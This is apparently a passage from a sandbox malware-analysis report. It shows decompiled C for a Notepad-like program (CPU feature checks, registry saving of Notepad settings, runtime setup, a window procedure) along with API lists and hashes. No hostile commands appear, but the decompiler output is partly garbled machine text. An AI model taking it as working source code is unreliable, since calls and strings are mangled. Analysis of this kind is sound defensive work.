                    						if((_t78 & 0x00000200) != 0) {
                    							 *0x415c68 = _t96 | 0x00000002;
                    						}
                    					}
                    					_t61 =  *0x415030; // 0x6f
                    					_t62 = _t61 | 0x00000002;
                    					 *0x415c64 = 1;
                    					 *0x415030 = _t62;
                    					if((_t85 & 0x00100000) != 0) {
                    						_t63 = _t62 | 0x00000004;
                    						 *0x415c64 = 2;
                    						 *0x415030 = _t63;
                    						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                    							asm("xgetbv");
                    							_v24 = _t63;
                    							_v20 = _t90;
                    							_t104 = 6;
                    							if((_v24 & _t104) == _t104) {
                    								_t66 =  *0x415030; // 0x6f
                    								_t67 = _t66 | 0x00000008;
                    								 *0x415c64 = 3;
                    								 *0x415030 = _t67;
                    								if((_t78 & 0x00000020) != 0) {
                    									 *0x415c64 = 5;
                    									 *0x415030 = _t67 | 0x00000020;
                    									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                    										 *0x415030 =  *0x415030 | 0x00000040;
                    										 *0x415c64 = _t104;
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L23;
                    				}
                    				_t73 = _v40 & 0x0fff3ff0;
                    				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                    					_t99 =  *0x415c68; // 0x2
                    					_t96 = _t99 | 0x00000001;
                    					 *0x415c68 = _t96;
                    					goto L10;
                    				} else {
                    					goto L9;
                    				}
                    			}































                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00402091
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                    • Instruction ID: f4e6d6712146c31b67f0ac610b88ab6e8419e367a2555085ce8b4d0adaa77c0e
                    • Opcode Fuzzy Hash: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                    • Instruction Fuzzy Hash: F6515AB1911A15CBDB14CF94DAD97EABBF1FB88314F14857AC445EB3A0D3B89900CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00281290() {
                    				void* _v8;
                    				char _v12;
                    				char _v16;
                    				int _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				char _v32;
                    				struct _WINDOWPLACEMENT _v64;
                    				long _t80;
                    				int _t126;
                    				char _t173;
                    				char _t174;
                    				intOrPtr _t175;
                    				intOrPtr _t177;
                    				signed int _t194;
                    
                    				_t80 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
                    				if(_t80 == 0) {
                    					_v64.length = 0x2c;
                    					GetWindowPlacement( *0x2970e4,  &_v64);
                    					 *0x295f70 = _v28;
                    					 *0x295f68 = _v64.rcNormalPosition;
                    					 *0x295f74 = _v24;
                    					 *0x295f6c = _v32;
                    					_v12 =  *0x29715c;
                    					RegSetValueExW(_v8, L"fWrap", 0, 4,  &_v12, 4);
                    					_t173 =  *0x295f68; // 0x0
                    					_v12 = _t173;
                    					RegSetValueExW(_v8, L"iWindowPosX", 0, 4,  &_v12, 4);
                    					_t174 =  *0x295f6c; // 0x0
                    					_v12 = _t174;
                    					RegSetValueExW(_v8, L"iWindowPosY", 0, 4,  &_v12, 4);
                    					_t175 =  *0x295f70; // 0x0
                    					_v12 = _t175 -  *0x295f68;
                    					RegSetValueExW(_v8, L"iWindowPosDX", 0, 4,  &_v12, 4);
                    					_t177 =  *0x295f74; // 0x0
                    					_v12 = _t177 -  *0x295f6c;
                    					RegSetValueExW(_v8, L"iWindowPosDY", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297117 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfCharSet", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297119 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfClipPrecision", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297108;
                    					RegSetValueExW(_v8, L"lfEscapement", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297114 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfItalic", 0, 4,  &_v12, 4);
                    					_v12 =  *0x29710c;
                    					RegSetValueExW(_v8, L"lfOrientation", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297118 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfOutPrecision", 0, 4,  &_v12, 4);
                    					_v12 =  *0x29711b & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 4,  &_v12, 4);
                    					_v12 =  *0x29711a & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfQuality", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297116 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfStrikeOut", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297115 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfUnderline", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297110;
                    					RegSetValueExW(_v8, L"lfWeight", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e50;
                    					RegSetValueExW(_v8, L"iMarginTop", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e54;
                    					RegSetValueExW(_v8, L"iMarginBottom", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e58;
                    					RegSetValueExW(_v8, L"iMarginLeft", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e5c;
                    					RegSetValueExW(_v8, L"iMarginRight", 0, 4,  &_v12, 4);
                    					_t194 =  *0x2970f8;
                    					_v12 = _t194;
                    					RegSetValueExW(_v8, L"bStatusBar", 0, 4,  &_v12, 4);
                    					_t126 = E00281020();
                    					asm("cdq");
                    					_v16 = MulDiv(( *0x297100 ^ _t194) - _t194, 0x2d0, _t126);
                    					RegSetValueExW(_v8, L"iPointSize", 0, 4,  &_v16, 4);
                    					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x29711c, lstrlenW(0x29711c) + _t133);
                    					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x297e60, lstrlenW(0x297e60) + _t136);
                    					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x298068, lstrlenW(0x298068) + _t139);
                    					return RegCloseKey(_v8);
                    				}
                    				return _t80;
                    			}



















                    APIs
                    • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                    • GetWindowPlacement.USER32(?,?), ref: 002812D6
                    • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                    • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                    • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 002813C4
                    • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 002813E3
                    • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00281401
                    • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 00281420
                    • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 0028143E
                    • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 0028145D
                    • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0028147C
                    • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 0028149B
                    • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 002814BA
                    • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 002814D9
                    • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 002814F7
                    • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 00281515
                    • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00281533
                    • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00281551
                    • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 0028156F
                    • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 0028158D
                      • Part of subcall function 00281020: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                      • Part of subcall function 00281020: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                      • Part of subcall function 00281020: RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    • MulDiv.KERNEL32(?,000002D0,00000000), ref: 002815A5
                    • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 002815C1
                    • lstrlenW.KERNEL32(0029711C), ref: 002815CE
                    • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,0029711C,00000000), ref: 002815E5
                    • lstrlenW.KERNEL32(00297E60), ref: 002815EC
                    • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00297E60,00000000), ref: 00281603
                    • lstrlenW.KERNEL32(00298068), ref: 0028160A
                    • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00298068,00000000), ref: 00281621
                    • RegCloseKey.ADVAPI32(?), ref: 00281627
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
                    • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                    • API String ID: 3965342766-4088090211
                    • Opcode ID: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction ID: 7683da5cacc04de4b6a450b4fe93bf3db442fa3ee8cca3673ad3d0b9cb0cef88
                    • Opcode Fuzzy Hash: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction Fuzzy Hash: B5C140B5BA431CBFEB14DB94DC86FAD7BB9AB49B00F104156B700B72D0C6B06A54CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 62%
                    			E00286A51(void* __ebx) {
                    				void* __edi;
                    				void* __esi;
                    				_Unknown_base(*)()* _t7;
                    				long _t10;
                    				void* _t11;
                    				int _t12;
                    				void* _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t18;
                    				intOrPtr _t21;
                    				long _t26;
                    				void* _t30;
                    				struct HINSTANCE__* _t35;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				intOrPtr* _t41;
                    				void* _t42;
                    
                    				_t30 = __ebx;
                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t35 != 0) {
                    					 *0x295a5c = GetProcAddress(_t35, "FlsAlloc");
                    					 *0x295a60 = GetProcAddress(_t35, "FlsGetValue");
                    					 *0x295a64 = GetProcAddress(_t35, "FlsSetValue");
                    					_t7 = GetProcAddress(_t35, "FlsFree");
                    					__eflags =  *0x295a5c;
                    					_t39 = TlsSetValue;
                    					 *0x295a68 = _t7;
                    					if( *0x295a5c == 0) {
                    						L6:
                    						 *0x295a60 = TlsGetValue;
                    						 *0x295a5c = E00286761;
                    						 *0x295a64 = _t39;
                    						 *0x295a68 = TlsFree;
                    					} else {
                    						__eflags =  *0x295a60;
                    						if( *0x295a60 == 0) {
                    							goto L6;
                    						} else {
                    							__eflags =  *0x295a64;
                    							if( *0x295a64 == 0) {
                    								goto L6;
                    							} else {
                    								__eflags = _t7;
                    								if(_t7 == 0) {
                    									goto L6;
                    								}
                    							}
                    						}
                    					}
                    					_t10 = TlsAlloc();
                    					 *0x294544 = _t10;
                    					__eflags = _t10 - 0xffffffff;
                    					if(_t10 == 0xffffffff) {
                    						L15:
                    						_t11 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t12 = TlsSetValue(_t10,  *0x295a60);
                    						__eflags = _t12;
                    						if(_t12 == 0) {
                    							goto L15;
                    						} else {
                    							E00285DA0();
                    							_t41 = __imp__EncodePointer;
                    							_t14 =  *_t41( *0x295a5c);
                    							 *0x295a5c = _t14;
                    							_t15 =  *_t41( *0x295a60);
                    							 *0x295a60 = _t15;
                    							_t16 =  *_t41( *0x295a64);
                    							 *0x295a64 = _t16;
                    							 *0x295a68 =  *_t41( *0x295a68);
                    							_t18 = E00286E3A();
                    							__eflags = _t18;
                    							if(_t18 == 0) {
                    								L14:
                    								E0028679E();
                    								goto L15;
                    							} else {
                    								_t36 = __imp__DecodePointer;
                    								_t21 =  *((intOrPtr*)( *_t36()))( *0x295a5c, E00286922);
                    								 *0x294540 = _t21;
                    								__eflags = _t21 - 0xffffffff;
                    								if(_t21 == 0xffffffff) {
                    									goto L14;
                    								} else {
                    									_t42 = E00286CCA(1, 0x214);
                    									__eflags = _t42;
                    									if(_t42 == 0) {
                    										goto L14;
                    									} else {
                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x295a64,  *0x294540, _t42);
                    										if(__eflags == 0) {
                    											goto L14;
                    										} else {
                    											_push(0);
                    											_push(_t42);
                    											E002867DB(_t30, _t36, _t42, __eflags);
                    											_t26 = GetCurrentThreadId();
                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                    											 *_t42 = _t26;
                    											_t11 = 1;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					return _t11;
                    				} else {
                    					E0028679E();
                    					return 0;
                    				}
                    			}






















                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0028348E), ref: 00286A59
                    • __mtterm.LIBCMT ref: 00286A65
                      • Part of subcall function 0028679E: DecodePointer.KERNEL32(FFFFFFFF,00286BC7,?,0028348E), ref: 002867AF
                      • Part of subcall function 0028679E: TlsFree.KERNEL32(FFFFFFFF,00286BC7,?,0028348E), ref: 002867C9
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(00000000,00000000,00012E6A,?,00286BC7,?,0028348E), ref: 00286EA1
                      • Part of subcall function 0028679E: _free.LIBCMT ref: 00286EA4
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(FFFFFFFF,00012E6A,?,00286BC7,?,0028348E), ref: 00286ECB
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00286A7B
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00286A88
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00286A95
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00286AA2
                    • TlsAlloc.KERNEL32(?,0028348E), ref: 00286AF2
                    • TlsSetValue.KERNEL32(00000000,?,0028348E), ref: 00286B0D
                    • __init_pointers.LIBCMT ref: 00286B17
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B28
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B35
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B42
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B4F
                    • DecodePointer.KERNEL32(00286922,?,0028348E), ref: 00286B70
                    • __calloc_crt.LIBCMT ref: 00286B85
                    • DecodePointer.KERNEL32(00000000,?,0028348E), ref: 00286B9F
                    • GetCurrentThreadId.KERNEL32 ref: 00286BB1
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 0968ed3b8e95abebff921932b3ff1c6de50f95390b2de25a8d4303b419b4d934
                    • Instruction ID: 806961e2b0e1b2a503bf1dd311f57dede3cff168ecaa759e9c7d1cdb5a234e0a
                    • Opcode Fuzzy Hash: 0968ed3b8e95abebff921932b3ff1c6de50f95390b2de25a8d4303b419b4d934
                    • Instruction Fuzzy Hash: 97318035A227259FDB127FB4BC8DA193BE5EB05724B180617E404E36F0D7748961CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E00282340(struct HWND__* _a4, int _a8, int _a12, unsigned int _a16) {
                    				short _v524;
                    				struct tagRECT _v540;
                    				void* __edi;
                    				void* __esi;
                    				int _t35;
                    				struct HWND__* _t43;
                    				struct HWND__* _t48;
                    				void* _t81;
                    				signed int _t86;
                    				void* _t122;
                    				signed int _t136;
                    				void* _t138;
                    
                    				_t35 = _a8;
                    				_t138 = (_t136 & 0xfffffff8) - 0x21c;
                    				if(_t35 != ( *0x295f64 & 0x0000ffff)) {
                    					__eflags = _t35 - 0x10;
                    					if(__eflags > 0) {
                    						__eflags = _t35 - 0x117;
                    						if(__eflags > 0) {
                    							__eflags = _t35 - 0x233;
                    							if(_t35 == 0x233) {
                    								_t122 = _a12;
                    								DragQueryFileW(_t122, 0,  &_v524, 0x41);
                    								DragFinish(_t122);
                    								 *0x280000( &_v524, 0xffffffff);
                    								goto L33;
                    							} else {
                    								__eflags = _t35 - 0x307;
                    								if(_t35 == 0x307) {
                    									goto L33;
                    								} else {
                    									goto L31;
                    								}
                    							}
                    						} else {
                    							if(__eflags == 0) {
                    								E00281F50(_a12);
                    								__eflags = 0;
                    								return 0;
                    							} else {
                    								__eflags = _t35 - 0x11;
                    								if(_t35 == 0x11) {
                    									_t43 =  *0x280000();
                    									__eflags = _t43;
                    									if(_t43 == 0) {
                    										goto L33;
                    									} else {
                    										return 1;
                    									}
                    								} else {
                    									__eflags = _t35 - 0x111;
                    									if(_t35 != 0x111) {
                    										goto L31;
                    									} else {
                    										E00281C40(_a12 & 0x0000ffff);
                    										__eflags = 0;
                    										return 0;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						if(__eflags == 0) {
                    							_t48 =  *0x280000();
                    							__eflags = _t48;
                    							if(_t48 == 0) {
                    								goto L33;
                    							} else {
                    								DestroyWindow(_a4);
                    								__eflags = 0;
                    								return 0;
                    							}
                    						} else {
                    							_t86 = _t35 - 1;
                    							__eflags = _t86 - 6;
                    							if(_t86 > 6) {
                    								L31:
                    								return DefWindowProcW(_a4, _t35, _a12, _a16);
                    							} else {
                    								switch( *((intOrPtr*)(_t86 * 4 +  &M002825F4))) {
                    									case 0:
                    										_t130 = _a4;
                    										_t107 = 0x50a00144;
                    										GetClientRect(_t130,  &_v540);
                    										__eflags =  *0x29715c;
                    										if( *0x29715c == 0) {
                    											_t107 = 0x50b001c4;
                    										}
                    										 *0x2970ec = CreateWindowExW(0x200, L"edit", 0, _t107, 0, 0, _v540.right, _v540.bottom, _t130, 0,  *0x2970e0, 0);
                    										_t55 = CreateFontIndirectW(0x297100);
                    										 *0x2970f0 = _t55;
                    										SendMessageW( *0x2970ec, 0x30, _t55, 0);
                    										SendMessageW( *0x2970ec, 0xc5, 0, 0);
                    										 *0x2970f4 = CreateWindowExW(0, "jnj", 0, 0x50000000, 0, 0, 0, "jjjjh", _t130, 0,  *0x2970e0, 0);
                    										_t62 = LoadStringW( *0x2970e0, 0x206, 0x2970fc, 0) | 0xffffffff;
                    										 *0x298274 = _t62;
                    										 *0x298278 = _t62;
                    										E00281090();
                    										__eflags = 0;
                    										return 0;
                    										goto L34;
                    									case 1:
                    										__eax = E00281290();
                    										PostQuitMessage(0);
                    										__eax = 0;
                    										__eflags = 0;
                    										_pop(__edi);
                    										_pop(__esi);
                    										return 0;
                    										goto L34;
                    									case 2:
                    										goto L31;
                    									case 3:
                    										__eax = _a16;
                    										_a16 >> 0x10 = E00281230(_a16 >> 0x10, __cx & 0x0000ffff);
                    										__eax = 0;
                    										__eflags = 0;
                    										_pop(__edi);
                    										_pop(__esi);
                    										return 0;
                    										goto L34;
                    									case 4:
                    										SetFocus( *0x2970ec) = 0;
                    										__eflags = 0;
                    										_pop(__edi);
                    										_pop(__esi);
                    										return 0;
                    										goto L34;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t81 = _a16;
                    					if(( *(_t81 + 0xc) & 0x00000040) != 0) {
                    						 *0x2970e8 = 0;
                    					}
                    					if(( *(_t81 + 0xc) & 0x00000008) != 0) {
                    						memcpy(0x2982a4, _t81, 0xa << 2);
                    						_t138 = _t138 + 0xc;
                    						E00281FF0(_t81);
                    					}
                    					if(( *(_t81 + 0xc) & 0x00000010) != 0) {
                    						memcpy(0x2982a4, _t81, 0xa << 2);
                    						_t138 = _t138 + 0xc;
                    						E00282130(_t81);
                    					}
                    					if(( *(_t81 + 0xc) & 0x00000020) == 0) {
                    						L33:
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						memcpy(0x2982a4, _t81, 0xa << 2);
                    						E00282200(_t81);
                    						return 0;
                    					}
                    				}
                    				L34:
                    			}
















                    APIs
                    • GetClientRect.USER32 ref: 002823FE
                    • CreateWindowExW.USER32 ref: 0028243E
                    • CreateFontIndirectW.GDI32(00297100), ref: 0028244A
                    • SendMessageW.USER32(?,00000030,00000000,00000000), ref: 00282466
                    • SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 00282478
                    • CreateWindowExW.USER32 ref: 00282499
                    • LoadStringW.USER32(?,00000206,002970FC,00000000), ref: 002824B2
                      • Part of subcall function 00281290: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                      • Part of subcall function 00281290: GetWindowPlacement.USER32(?,?), ref: 002812D6
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • PostQuitMessage.USER32(00000000), ref: 002824DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$Create$MessageWindow$Send$ClientFontIndirectLoadPlacementPostQuitRectString
                    • String ID: VQRj$edit$jjjjh$jnj
                    • API String ID: 3987337835-3548645043
                    • Opcode ID: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction ID: 2b53c4a1264e6350e1134cc7a8918ad7f2b26b5cc1d221b23885593c0b876936
                    • Opcode Fuzzy Hash: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction Fuzzy Hash: 3C715B363652089BE714EFA9FC8DF6A7398EB84321F10452BFE08DB1D0D67598248760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00281E60() {
                    				WCHAR* _t42;
                    				WCHAR* _t43;
                    				WCHAR* _t44;
                    
                    				LoadStringW( *0x2970e0, 0x176, 0x297984, 0xff);
                    				_t42 = 0x297986 + lstrlenW(0x297984) * 2;
                    				lstrcpyW(_t42, L"*.txt");
                    				_t43 = _t42 + 2 + lstrlenW(_t42) * 2;
                    				LoadStringW( *0x2970e0, 0x175, _t43, 0xff);
                    				_t44 = _t43 + 2 + lstrlenW(_t43) * 2;
                    				lstrcpyW(_t44, L"*.*");
                    				 *((short*)(_t44 + 2 + lstrlenW(_t44) * 2)) = 0;
                    				 *0x2982cc = 0;
                    				 *0x2982d0 = 0;
                    				asm("sbb eax, eax");
                    				CheckMenuItem(GetMenu( *0x2970e4), 0x119,  ~( *0x29715c) & 0x00000008);
                    				asm("sbb edx, edx");
                    				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~( *0x2970f8) & 0x00000008);
                    				asm("sbb ecx, ecx");
                    				return ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
                    			}






                    APIs
                    • LoadStringW.USER32(?,00000176,00297984,000000FF), ref: 00281E7E
                    • lstrlenW.KERNEL32(00297984,?,?,?,?,?,?,?), ref: 00281E8B
                    • lstrcpyW.KERNEL32 ref: 00281E9A
                    • lstrlenW.KERNEL32(80000000,?,?,?,?,?,?,?), ref: 00281EA1
                    • LoadStringW.USER32(?,00000175,?,000000FF), ref: 00281EB9
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281EBC
                    • lstrcpyW.KERNEL32 ref: 00281EC8
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281ECF
                    • GetMenu.USER32(?), ref: 00281F03
                    • CheckMenuItem.USER32(00000000), ref: 00281F0C
                    • GetMenu.USER32(?), ref: 00281F27
                    • CheckMenuItem.USER32(00000000), ref: 00281F2A
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00281F41
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                    • String ID: *.*$*.txt
                    • API String ID: 3918228958-3257935098
                    • Opcode ID: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction ID: 9ee78d2d1968606edcfef0ee4bae9b0d193893bdaa9c418f8ab1c688c1add7d7
                    • Opcode Fuzzy Hash: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction Fuzzy Hash: 9A218E72674215BFD6089B79FC8EEBA3779EFC9B00701811BF609E31A0DA74A4118B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00282200(intOrPtr _a4) {
                    				void* _v8;
                    				int _v12;
                    				void* _t24;
                    				void* _t30;
                    				int _t35;
                    				void* _t43;
                    				void* _t58;
                    				int _t60;
                    				intOrPtr _t61;
                    				void* _t65;
                    
                    				_v12 = lstrlenW( *(_a4 + 0x10));
                    				SendMessageW( *0x2970ec, 0xb1, 0, 0);
                    				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    				_t60 = _t4;
